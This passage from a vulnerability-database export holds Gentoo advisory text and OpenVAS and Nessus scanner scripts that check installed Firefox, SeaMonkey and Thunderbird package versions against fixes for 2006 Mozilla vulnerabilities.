Zero Day Initiative showed that when used in a web page Java would reference properties of the window.navigator object as it started up.\n * Thilo Girmann discovered that in certain circumstances a JavaScript reference to a frame or window was not properly cleared when the referenced content went away.\n\n### Impact\n\nA user can be enticed to open specially crafted URLs, visit webpages containing malicious JavaScript or execute a specially crafted script. These events could lead to the execution of arbitrary code, or the installation of malware on the user's computer. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Thunderbird users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-1.0.3\"", "edition": 1, "modified": "2006-08-03T00:00:00", "published": "2006-08-03T00:00:00", "id": "GLSA-200608-02", "href": "https://security.gentoo.org/glsa/200608-02", "type": "gentoo", "title": "Mozilla SeaMonkey: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57853", "href": "http://plugins.openvas.org/nasl.php?oid=57853", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-03 (Firefox)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Mozilla Foundation has reported numerous security vulnerabilities\nrelated to Mozilla Firefox.\";\ntag_solution = \"All Mozilla Firefox users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n'>=www-client/mozilla-firefox-1.5.0.5'\n\nUsers of the binary package should upgrade as well:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n'>=www-client/mozilla-firefox-bin-1.5.0.5'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=141842\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-03.\";\n\n \n\nif(description)\n{\n script_id(57853);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200608-03 (Firefox)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/mozilla-firefox\", unaffected: make_list(\"ge 1.5.0.5\"), vulnerable: make_list(\"lt 1.5.0.5\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"www-client/mozilla-firefox-bin\", unaffected: make_list(\"ge 1.5.0.5\"), vulnerable: make_list(\"lt 1.5.0.5\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-02.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57852", "href": "http://plugins.openvas.org/nasl.php?oid=57852", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-02 (SeaMonkey)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Mozilla Foundation has reported numerous security vulnerabilities\nrelated to Mozilla SeaMonkey.\";\ntag_solution = \"All Thunderbird users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-1.0.3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=141842\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-02.\";\n\n \n\nif(description)\n{\n script_id(57852);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200608-02 (SeaMonkey)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/seamonkey\", unaffected: make_list(\"ge 1.0.3\"), vulnerable: make_list(\"lt 1.0.3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-19T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:57146", "href": "http://plugins.openvas.org/nasl.php?oid=57146", "type": "openvas", "title": "FreeBSD Ports: firefox", "sourceData": "#\n#VID e2a92664-1d60-11db-88cf-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n firefox\n linux-firefox\n linux-firefox-devel\n seamonkey\n linux-seamonkey\n thunderbird\n linux-thunderbird\n mozilla-thunderbird\n mozilla\n linux-mozilla\n linux-mozilla-devel\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html#seamonkey1.0.3\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-44.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-45.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-46.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-47.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-48.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-49.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-50.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-51.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-52.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-53.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-54.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-55.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-56.html\nhttp://www.vuxml.org/freebsd/e2a92664-1d60-11db-88cf-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57146);\n script_version(\"$Revision: 4112 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-19 15:17:59 +0200 (Mon, 19 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: firefox\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.5.0.5,1\")<0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.*,1\")>0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.5.0.5\")<0) {\n txt += 'Package linux-firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-firefox-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.0.a2006.07.26\")<0) {\n txt += 'Package linux-firefox-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"seamonkey\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.3\")<0) {\n txt += 'Package seamonkey version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-seamonkey\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.3\")<0) {\n txt += 'Package linux-seamonkey version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.5.0.5\")<0) {\n txt += 'Package thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.5.0.5\")<0) {\n txt += 'Package linux-thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.5.0.5\")<0) {\n txt += 'Package mozilla-thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package linux-mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package linux-mozilla-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200608-03\n(Mozilla Firefox: Multiple vulnerabilities)\n\n The following vulnerabilities have been reported:\n Benjamin Smedberg discovered that chrome URL's could be made to\n reference remote files.\n Developers in the Mozilla community\n looked for and fixed several crash bugs to improve the stability of\n Mozilla clients.\n 'shutdown' reports that cross-site scripting\n (XSS) attacks could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a function that\n appeared to belong to the window in question even after it had been\n navigated to the target site.\n 'shutdown' reports that scripts\n granting the UniversalBrowserRead privilege can leverage that into the\n equivalent of the far more powerful UniversalXPConnect since they are\n allowed to 'read' into a privileged context.\n 'moz_bug_r_a4'\n reports that A malicious Proxy AutoConfig (PAC) server could serve a\n PAC script that can execute code with elevated privileges by setting\n the required FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox.\n 'moz_bug_r_a4' discovered that Named JavaScript functions have a\n parent object created using the standard Object() constructor\n (ECMA-specified behavior) and that this constructor can be redefined by\n script (also ECMA-specified behavior).\n Igor Bukanov and\n shutdown found additional places where an untimely garbage collection\n could delete a temporary object that was in active use.\n Georgi\n Guninski found potential integer overflow issues with long strings in\n the toSource() methods of the Object, Array and String objects as well\n as string function arguments.\n H. D. Moore reported a testcase\n that was able to trigger a race condition where JavaScript garbage\n collection deleted a temporary variable still being used in the\n creation of a new Function object.\n A malicious page can hijack\n native DOM methods on a document object in another domain, which will\n run the attacker's script when called by the victim page.\n Secunia Research has discovered a vulnerability which is caused due\n to an memory corruption error within the handling of simultaneously\n happening XPCOM events. This leads to use of a deleted timer\n object.\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java would reference\n properties of the window.navigator object as it started up.\n Thilo Girmann discovered that in certain circumstances a JavaScript\n reference to a frame or window was not properly cleared when the\n referenced content went away.\n \nImpact :\n\n A user can be enticed to open specially crafted URLs, visit webpages\n containing malicious JavaScript or execute a specially crafted script.\n These events could lead to the execution of arbitrary code, or the\n installation of malware on the user's computer.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2006-08-04T00:00:00", "title": "GLSA-200608-03 : Mozilla Firefox: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2006-08-04T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mozilla-firefox-bin", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mozilla-firefox"], "id": "GENTOO_GLSA-200608-03.NASL", "href": "https://www.tenable.com/plugins/nessus/22145", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-03.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22145);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_xref(name:\"GLSA\", value:\"200608-03\");\n\n script_name(english:\"GLSA-200608-03 : Mozilla Firefox: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-03\n(Mozilla Firefox: Multiple vulnerabilities)\n\n The following vulnerabilities have been reported:\n Benjamin Smedberg discovered that chrome URL's could be made to\n reference remote files.\n Developers in the Mozilla community\n looked for and fixed several crash bugs to improve the stability of\n Mozilla clients.\n 'shutdown' reports that cross-site scripting\n (XSS) attacks could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a function that\n appeared to belong to the window in question even after it had been\n navigated to the target site.\n 'shutdown' reports that scripts\n granting the UniversalBrowserRead privilege can leverage that into the\n equivalent of the far more powerful UniversalXPConnect since they are\n allowed to 'read' into a privileged context.\n 'moz_bug_r_a4'\n reports that A malicious Proxy AutoConfig (PAC) server could serve a\n PAC script that can execute code with elevated privileges by setting\n the required FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox.\n 'moz_bug_r_a4' discovered that Named JavaScript functions have a\n parent object created using the standard Object() constructor\n (ECMA-specified behavior) and that this constructor can be redefined by\n script (also ECMA-specified behavior).\n Igor Bukanov and\n shutdown found additional places where an untimely garbage collection\n could delete a temporary object that was in active use.\n Georgi\n Guninski found potential integer overflow issues with long strings in\n the toSource() methods of the Object, Array and String objects as well\n as string function arguments.\n H. D. Moore reported a testcase\n that was able to trigger a race condition where JavaScript garbage\n collection deleted a temporary variable still being used in the\n creation of a new Function object.\n A malicious page can hijack\n native DOM methods on a document object in another domain, which will\n run the attacker's script when called by the victim page.\n Secunia Research has discovered a vulnerability which is caused due\n to an memory corruption error within the handling of simultaneously\n happening XPCOM events. This leads to use of a deleted timer\n object.\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java would reference\n properties of the window.navigator object as it started up.\n Thilo Girmann discovered that in certain circumstances a JavaScript\n reference to a frame or window was not properly cleared when the\n referenced content went away.\n \nImpact :\n\n A user can be enticed to open specially crafted URLs, visit webpages\n containing malicious JavaScript or execute a specially crafted script.\n These events could lead to the execution of arbitrary code, or the\n installation of malware on the user's computer.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Mozilla Firefox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/mozilla-firefox-1.5.0.5'\n Users of the binary package should upgrade as well:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/mozilla-firefox-bin-1.5.0.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/mozilla-firefox-bin\", unaffected:make_list(\"ge 1.5.0.5\"), vulnerable:make_list(\"lt 1.5.0.5\"))) flag++;\nif (qpkg_check(package:\"www-client/mozilla-firefox\", unaffected:make_list(\"ge 1.5.0.5\"), vulnerable:make_list(\"lt 1.5.0.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:48:34", "description": "The installed version of Firefox is affected by various security\nissues, some of which may lead to execution of arbitrary code on the\naffected host subject to the user's privileges.", "edition": 25, "published": "2006-07-27T00:00:00", "title": "Firefox < 1.5.0.5 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_1505.NASL", "href": "https://www.tenable.com/plugins/nessus/22095", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (NASL_LEVEL < 3004) exit(0);\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22095);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\",\n \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\",\n \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_bugtraq_id(19181, 19192, 19197);\n script_xref(name:\"CERT\", value:\"655892\");\n\n script_name(english:\"Firefox < 1.5.0.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Firefox\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Firefox is affected by various security\nissues, some of which may lead to execution of arbitrary code on the\naffected host subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-44/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-45/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-46/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-47/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-48/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-50/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-51/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-52/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-53/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-54/\");\n 